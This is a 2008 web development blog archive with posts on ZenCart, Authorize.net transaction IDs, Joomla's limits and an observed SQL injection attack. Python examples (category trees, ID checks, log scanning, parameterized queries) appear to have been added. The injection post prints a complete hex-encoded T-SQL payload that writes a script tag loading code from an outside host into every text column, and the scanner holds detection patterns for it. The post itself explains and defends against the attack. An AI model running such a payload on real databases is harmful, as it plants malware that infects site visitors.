Archive for August, 2008

Inspiring Commentary Article on Web Design Practices

August 27th, 2008

Web Design by Design, written by Kimberly Elam, made me think twice before running to draft the next web site design with our designer. This same minimalistic approach, almost too little but just enough to make a clear point, is great because it begs for more. As Kimberly puts it, the user remains hungry for more information. And guess what they will probably do? Call or email for more information!

This article highlights a similar line of thought for successful web firms: they target what their clients need, not what they can do with technology or design. This reminds us that websites, in any aspect, design or web development, are here to serve the business. A website is just a tool, not the goal.

This matches our line of thought at Activo: each one of our proposals begins with the goals of the project. In other words, what will we achieve with the following web development project?

Web Design, Web Development, Web-based User Interfaces

Looking Ahead: ZenCart ver 1.4

August 25th, 2008

The ZenCart developer team seems to be hard at work and preparing to deliver a new version of ZenCart: ver 1.4. The core developers posted a roadmap brief for version 1.4 back in September of 2007. Recently, additional entries have been posted in the forums describing in more detail the upcoming changes and signaling a new release is to be expected soon.

The updates described so far all concern the database: its driver architecture, its caching, and its performance. To summarise from the ZenCart forums:

  • New database driver layer
    • Extremely light/flexible drivers make it easier to support other database types
    • Preliminary support for InnoDB and MySQL transactions
  • SQL caching system rewritten
    • Much easier to add new caching types
    • Preliminary support for Memcache
  • Use of MPTT for category structure
    • Reduces the number of queries needed to ‘describe’ the category structure
    • Improves user experience through reduced page load times
  • Supporting classes to reduce query load
    • Hugely reduces the number of queries needed
    • Reuses queries via the cache to further improve performance

The roadmap for ZenCart ver 1.4 promises the following updates to the code (summarized):

  • Better usage of PHP 5.2 features. This also means 5.2 will be the new minimum requirement.
  • More Object Oriented code, less of the old osCommerce code.
  • Lots of DB improvements (some is described above, seems more is yet to come).
  • Category structure converted to MPTT format. MPTT stands for Modified Preorder Tree Traversal (explanation of MPTT).
  • Performance improvements for sites with lots of product attributes.
  • More function libraries converted to classes.
  • Duplicate components shared between admin and catalog.
  • Template system enhancements: less tables and more admin control.
  • Additional notifiers for the observer system.
  • Transaction support with InnoDB (the recent forum posts on the work done so far describe this as preliminary).
  • SwiftMailer instead of phpMailer.
  • Stock and SKU per product attribute.
  • Security enhancements.
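To make the MPTT item concrete, here is an added example (not ZenCart's code, and not its schema) that numbers a small constructed category tree with the nested-set left/right values MPTT assigns, loads it into an in-memory SQLite table, and compares the two ways of fetching a subtree: one query with lft/rgt against one query per node with a plain parent_id column. Table and column names, and the sample tree, are assumptions for the example.

```python
import itertools
import sqlite3

# Constructed sample category tree (not ZenCart's own data or schema):
#   Root
#   ├── Hardware
#   │   ├── Laptops
#   │   └── Desktops
#   └── Software
TREE = ("Root", [("Hardware", [("Laptops", []), ("Desktops", [])]),
                 ("Software", [])])


def number_tree(node, parent_id=None, rows=None, counter=None):
    """Modified preorder traversal: every node gets `lft` when first visited
    and `rgt` after all of its children have been visited, so a node's
    descendants are exactly the rows whose lft lies strictly between its
    own lft and rgt."""
    if rows is None:
        rows, counter = [], itertools.count(1)
    name, children = node
    node_id = len(rows) + 1
    row = [node_id, parent_id, name, next(counter), None]   # rgt is filled on the way back up
    rows.append(row)
    for child in children:
        number_tree(child, node_id, rows, counter)
    row[4] = next(counter)
    return rows


def build_db():
    """In-memory SQLite table holding both representations: parent_id
    (adjacency list) and lft/rgt (nested set). Hypothetical schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, parent_id INTEGER, "
                 "name TEXT, lft INTEGER, rgt INTEGER)")
    conn.executemany("INSERT INTO categories VALUES (?, ?, ?, ?, ?)", number_tree(TREE))
    conn.commit()
    return conn


def subtree_nested(conn, name):
    """Whole subtree in ONE query, however deep it is."""
    sql = ("SELECT c.name FROM categories c JOIN categories p "
           "ON c.lft > p.lft AND c.lft < p.rgt WHERE p.name = ? ORDER BY c.lft")
    return [r[0] for r in conn.execute(sql, (name,))]


def ancestors(conn, name):
    """Breadcrumb path (root first), also a single query."""
    sql = ("SELECT a.name FROM categories a JOIN categories n "
           "ON n.lft BETWEEN a.lft AND a.rgt WHERE n.name = ? ORDER BY a.lft")
    return [r[0] for r in conn.execute(sql, (name,))]


def subtree_adjacency(conn, name):
    """Same answer from parent_id alone: one round trip per node visited.
    Returns (names, number of queries executed) so the two can be compared."""
    queries = 1
    (root_id,) = conn.execute("SELECT id FROM categories WHERE name = ?", (name,)).fetchone()
    found, todo = [], [root_id]
    while todo:
        current = todo.pop(0)
        children = conn.execute("SELECT id, name FROM categories WHERE parent_id = ? ORDER BY id",
                                (current,)).fetchall()
        queries += 1
        for child_id, child_name in children:
            found.append(child_name)
            todo.append(child_id)
    return found, queries


if __name__ == "__main__":
    db = build_db()
    print("nested set :", subtree_nested(db, "Hardware"), "in 1 query")
    names, n = subtree_adjacency(db, "Hardware")
    print("adjacency  :", names, "in", n, "queries")
    print("breadcrumb :", " > ".join(ancestors(db, "Laptops")))
```

The price of the nested set is paid on writes: inserting or moving a category shifts the lft/rgt values of every node to its right, which is why it suits a category tree that is read far more often than it is edited.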

Keep up the good work!

eCommerce, PHP/MySQL, Web Development, ZenCart

Authorize.net changes Transaction ID field – ZenCart passes tests

August 21st, 2008

Just a quick note that Authorize.net will be upping the limit on the transaction id field. Apparently, they are close to reaching the limit of the field type, so they are adding digits to the field – we are talking about some really big numbers! ZenCart seems to have acknowledged the news and tested their latest stable release. On ZenCart’s end, all seems to be ok except for a small DB change that will only affect shops that choose to store the transactions over time. A quick fix is posted on ZenCart’s forum.

This also means that all plugins, modules, or any Authorize.net integration scripts need to be tested. This change will probably not be a make or break for any code that integrates with Authorize.net APIs, but it is worth verifying your code and your shopping cart just in case.

Originally Posted by Authorize.net:

What is going on with the Transaction ID field?
The Transaction ID field was originally developed with a maximum numeric value of 2,147,483,647. As the number of merchants using the Authorize.Net Payment Gateway has grown, we have identified a time in the near future in which the Transaction ID count will surpass 2,147,483,647. For this reason, we are in the process of expanding the range of Transaction IDs that the payment gateway can issue. Accordingly, we are communicating to all Authorize.Net merchants to verify that your systems can accommodate a 10-digit Transaction ID greater than 2,147,483,647.
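The check the notice asks for, as an added example (not code from Authorize.net or ZenCart): validate an incoming transaction id as a plain decimal string of at most 10 digits, show what a legacy signed 32-bit column does with a value past 2,147,483,647 (it wraps to a negative number, simulated here with ctypes), and test whether a given MySQL integer column type can hold every 10-digit id. The MySQL ranges are the standard signed and unsigned limits; which column type a particular shop uses is an assumption you would fill in from your own schema.

```python
import ctypes

INT32_MAX = 2_147_483_647          # the old ceiling quoted in the notice above
MAX_ID_DIGITS = 10                 # the widened ids are 10 digits, per the notice

# Maximum values of MySQL's integer column types (standard MySQL limits, listed
# because ZenCart runs on MySQL). A hypothetical lookup, not ZenCart's schema.
MYSQL_INT_MAX = {
    "INT": 2_147_483_647,
    "INT UNSIGNED": 4_294_967_295,
    "BIGINT": 9_223_372_036_854_775_807,
    "BIGINT UNSIGNED": 18_446_744_073_709_551_615,
}


def parse_transaction_id(raw):
    """Accept only a plain decimal string of at most MAX_ID_DIGITS digits; the
    gateway's field is numeric, so anything else is malformed or hostile input."""
    if not isinstance(raw, str) or not raw.isdigit() or len(raw) > MAX_ID_DIGITS:
        raise ValueError("transaction id must be 1-%d decimal digits" % MAX_ID_DIGITS)
    return int(raw)


def store_in_int32_column(txn_id):
    """What a legacy signed 32-bit column does with an id past the old limit:
    simulated with ctypes, the value silently wraps around to a negative number."""
    return ctypes.c_int32(txn_id).value


def column_can_hold(column_type, digits=MAX_ID_DIGITS):
    """True if the given MySQL integer type can store every id of `digits` digits."""
    largest_id = 10 ** digits - 1
    return MYSQL_INT_MAX[column_type.upper()] >= largest_id


def audit_transaction_id(raw, column_type="INT"):
    """Summary a shop owner could run over a sample of recent ids and the
    column type their cart stores them in."""
    txn_id = parse_transaction_id(raw)
    return {
        "id": txn_id,
        "exceeds_old_limit": txn_id > INT32_MAX,
        "stored_as_int32": store_in_int32_column(txn_id),
        "column_ok": column_can_hold(column_type),
    }


if __name__ == "__main__":
    for sample in ("2147483647", "2147483648", "9999999999"):   # constructed sample ids
        print(sample, audit_transaction_id(sample, "INT"))
    for col in MYSQL_INT_MAX:
        print(col, "can hold 10-digit ids:", column_can_hold(col))
```

Note that switching a signed INT to INT UNSIGNED only buys room up to 4,294,967,295, still short of a 10-digit id; BIGINT (or a character column wide enough for 10 digits) is the change that actually covers the new range.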

eCommerce, Web Development, ZenCart

Hack attempt: SQL Injection Targeting MS SQL Servers

August 19th, 2008

I noticed one of our client’s IIS web servers was getting a lot of SQL Injection attempts this past week. These attacks pass T-SQL code into querystring parameters in hopes that the application is not checking inputs.

Here’s the code: (I removed the SQL exec() statement and replaced it with print so you can see the unencoded SQL.)

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C4152452040542
05641524348415228323535292C4043205641524348415228323535292
04445434C415245205461626C655F437572736F7220435552534F52204
64F522053454C45435420612E6E616D652C622E6E616D652046524F4D2
07379736F626A6563747320612C737973636F6C756D6E7320622057484
5524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D333
5204F5220622E78747970653D323331204F5220622E78747970653D313
63729204F50454E205461626C655F437572736F72204645544348204E4
558542046524F4D205461626C655F437572736F7220494E544F2040542
C4043205748494C4528404046455443485F5354415455533D302920424
547494E20455845432827555044415445205B272B40542B275D2053455
4205B272B40432B275D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E393868732E72752F6A732E6A73
3E3C2F7363726970743E27272729204645544348204E4558542046524F4
D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F434154452
05461626C655F437572736F7220 AS VARCHAR(4000));

print @S;

This particular attack is well known and has been seen in several variants:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
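The hex-encoded CAST is what makes this family of attacks slip past naive keyword filters, so the first thing a defender wants is a way to spot the pattern in web server logs and decode the literal for triage. The following is an added example (not code from this post or from the references above) that scans constructed IIS-style log lines for a CAST(0x… AS VARCHAR) literal and for the T-SQL markers the attack needs, and decodes the hex. The log line format, the field positions and the sample payload are assumptions made for the example; the sample hex decodes to the harmless text "SELECT 1;", not to the payload shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method uri query status). These are
# samples written for this example, not entries from the client's server. The
# hex in the second line decodes to the harmless text "SELECT 1;".
LOG_LINES = [
    "2008-08-19 10:01:02 GET /products.aspx id=12 200",
    "2008-08-19 10:01:05 GET /products.aspx id=12;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(0x53454C45435420313B%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
    "2008-08-19 10:01:09 GET /search.aspx q=select+a+laptop 200",
]

# A 0x... literal being CAST to a string is the tell-tale of this attack family:
# the real statement is hidden from simple keyword filters until it is decoded.
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
# Secondary hints; the '@' and word boundaries keep a product search such as
# "select a laptop" from tripping them.
HINTS = re.compile(r"DECLARE\s+@|;\s*EXEC\b|\bsysobjects\b|\bsyscolumns\b", re.IGNORECASE)


def decode_hex_literal(hexdigits):
    """Turn the 0x literal back into text. T-SQL treats it as raw bytes, so decode
    as latin-1 (which never fails) and return None when the digit count is odd."""
    if len(hexdigits) % 2:
        return None
    return bytes.fromhex(hexdigits).decode("latin-1")


def scan_line(line):
    """Return a finding dict for one log line, or None if nothing suspicious."""
    parts = line.split(" ")
    if len(parts) < 6:
        return None
    query = unquote_plus(parts[4])          # the cs-uri-query field, URL-decoded
    hints = HINTS.findall(query)
    hexes = HEX_CAST.findall(query)
    if not hints and not hexes:
        return None
    return {
        "query": query,
        "hints": hints,
        "decoded": [decode_hex_literal(h) for h in hexes],
    }


def scan_log(lines):
    """Scan every line and report the index of each suspicious one."""
    findings = []
    for i, line in enumerate(lines):
        result = scan_line(line)
        if result:
            result["line"] = i
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print("line", f["line"], "hints:", f["hints"], "decoded:", f["decoded"])
```

Decoding before matching matters: the decoded text is where the cursor over sysobjects/syscolumns and the UPDATE statements of the real payload become visible, so a filter that only inspects the raw querystring sees nothing but a CAST of an opaque number.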

Following these web application best practices keeps us from getting hacked:

  • Application level:
    • Never trust user input (e.g. querystring or form posts). Always consider that user input may contain exploit code and check it appropriately.
    • Always use Stored Procedures and/or Parameterized database queries. Don’t build SQL queries using string concatenation.
    • Use typed variables when possible. Converting a querystring parameter to an integer before passing it to a SQL query can inhibit some attacks.
  • Database level:
    • Use limited database permissions. For example, for SQL Server, don’t let your application run under the “sa” user. The database user should only have permissions in the particular database used by the application.
    • If possible, disable extended stored procedures such as xp_cmdshell.
    • Don’t use dynamic SQL. Dynamic SQL can be just as bad as building queries using string concatenation. Some DBAs have server-wide policies of no dynamic SQL.
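The two application-level rules (parameterized queries and typed variables) side by side, as an added example that is not code from this post. It uses Python with an in-memory SQLite table rather than the .NET/SQL Server stack the post discusses, since the binding behaviour is the same in any driver; the product table, its rows and the function names are constructed for the example.

```python
import sqlite3


def setup():
    """Constructed product table (sample data for this example only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products (name, description) VALUES (?, ?)",
                     [("Widget", "A plain widget"), ("Gadget", "A small gadget")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, product_id):
    """'Before': the querystring value is pasted straight into the SQL text, so
    whatever the client sends becomes part of the statement."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, product_id):
    """'After': convert to the expected type first (rejects anything that is not
    an integer), then bind it as a parameter so the driver never treats it as SQL."""
    pid = int(product_id)       # raises ValueError for a value such as "1 OR 1=1"
    sql = "SELECT name, description FROM products WHERE id = ?"
    return conn.execute(sql, (pid,)).fetchall()


def search_safe(conn, name):
    """Free-text input cannot be typed away, so it is bound as a parameter: the
    value is compared as a literal string, quotes and all, never parsed as SQL."""
    sql = "SELECT name, description FROM products WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = setup()
    print("vulnerable, normal  :", lookup_vulnerable(db, "1"))
    print("vulnerable, tampered:", lookup_vulnerable(db, "1 OR 1=1"))   # returns every row
    print("safe, normal        :", lookup_safe(db, "1"))
    try:
        lookup_safe(db, "1 OR 1=1")
    except ValueError as err:
        print("safe, tampered      : rejected ->", err)
    print("search, tampered    :", search_safe(db, "' OR 1=1 --"))      # no match, no leak
```

The typed conversion is the cheaper of the two checks and fails closed, but it only works for numeric parameters; the parameter binding is what protects string inputs, so both belong in the data-access layer rather than in the database configuration.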

The application level is crucial. Since a web application may someday be moved to a new server, we can’t assume that the web server and database have been configured using best practices.

All layers of security are important, though: If you’re using a third-party or closed-source web application, you may not have access to application code. In that case, the Database and Web Server layers are your last defense against exploits in improperly written code.

.NET Framework, Web Development

5 Missing Features Preventing Joomla! CMS from Entering the Enterprise CMS Market

August 19th, 2008

You’ll love Joomla! CMS because it is a great open source and free CMS with lots of features, stable releases, and a huge supporting community. Don’t get us wrong, we love Joomla CMS too and truly believe that this open source application is a big head start for any content based website. But since we have used Joomla on many advanced Web 2.0 websites, we have found its limits, and sometimes struggled with those limits to the point of considering other systems or even using a framework instead. Let’s look closer at the missing features:

Looking closer at what features Joomla is missing

1. Directory or node-based category structure

This is one of the biggest pain points in using Joomla, or in explaining how to use Joomla to new users. Joomla places all content items within sections and categories. Before Joomla 1.5, all content items were required to be in one of these sections and categories. In other words, the system was limited to two levels of categorization, and that categorization was enforced. In Joomla 1.5 it is no longer a requirement; however, if you wish to categorize the content items, you must still use this archaic system.

So, what’s missing? It needs node-based categorization, similar to the folder structure in any operating system. You create folders with content items in them and you have a flexible and fully comprehensible system. No more workarounds. This would then boost the use of dynamic plugins that can rely on the folder structure for certain features. A great example is a News & Events section, which almost every serious website needs: with a flexible node system you create a news folder and an events folder and place your articles there. If in the future you wish to add sub-categories to your news – no problem! (With the current and the old system, you’ll have to rethink once you reach a certain depth.)

2. A Real Authorship Path and Publication Mechanism

Yes, it is true that users have multiple levels right out of the box in Joomla. But it lacks any sort of mechanism that controls the workflow of a content item. Ideally, one user adds new content items and another has to approve them before they go live in a specific section. The publisher user has the rights to publish only in his/her sections, and so on. This is a basic feature in many enterprise content management systems.

3. Content Articles Versioning

In Joomla, once you have made a change and hit that save button, there is no way to go back in time and undo your changes. Ideally, Joomla would save every instance of the content item and keep track of its versions. How it does so is not important: whether it uses SVN-like versioning that efficiently stores only the diffs, or saves the entire content item every time a revision is made, does not matter. The feature that is missing is the versioning itself.

4. Built In Separation Between ‘Live’ and ‘Staging’ Environments

For businesses that value their websites and understand how sensitive they are, we always recommend setting up a staging environment. This is where all users, developers, and designers can see the latest revisions before they go live. It provides another stage of error handling instead of running a fire drill on a regular basis. Many enterprise content management systems have this option as a built-in mechanism: from the same admin panel or work area, the admin presses a button and the latest version of the site is ‘pushed’ live. We currently have Linux scripts that do the job, but there is no way for a non-developer to handle this case. Ideally, this needs to be done from the admin panel of Joomla.

5. Document Management System (File Manager)

So, we all know that Joomla’s File Manager or ‘Media’ manager is a bit lacking. It has the basic functionality that assists with uploading, moving, and deleting files – but that’s it. A DMS (Document Management System) allows each user to manage their own document area, which in turn allows better handling of uploading and using files with drag and drop controls, and an improved management interface for admins that can more easily handle large numbers of folders and files.

Conclusion

Joomla CMS is a great open source CMS, no doubt. However, if the above five missing features were added, it would be easier for us to offer this CMS to the enterprise. For now, the commercial CMS spectrum is what we have to work with for enterprise level content management systems.

Content Management Systems, Joomla, Web Development